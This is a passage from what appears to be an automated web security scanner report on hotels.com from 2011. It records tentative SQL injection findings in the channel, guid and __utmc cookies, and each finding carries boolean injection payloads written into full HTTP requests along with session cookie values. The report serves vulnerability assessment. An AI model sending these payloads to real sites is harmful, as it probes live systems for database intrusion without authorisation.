Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:48 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...

1.18. http://www.hotels.com/hotel/details.html [channel cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The channel cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the channel cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC'%20and%201%3d1--%20; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:46 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC'%20and%201%3d2--%20; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...

1.19. http://www.hotels.com/hotel/details.html [guid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The guid cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the guid cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1'%20and%201%3d1--%20; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:38 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1'%20and%201%3d2--%20; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:38 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...

1.20. http://www.hotels.com/hotel/hoteldata.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/hoteldata.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 21059860'%20or%201%3d1--%20 and 21059860'%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
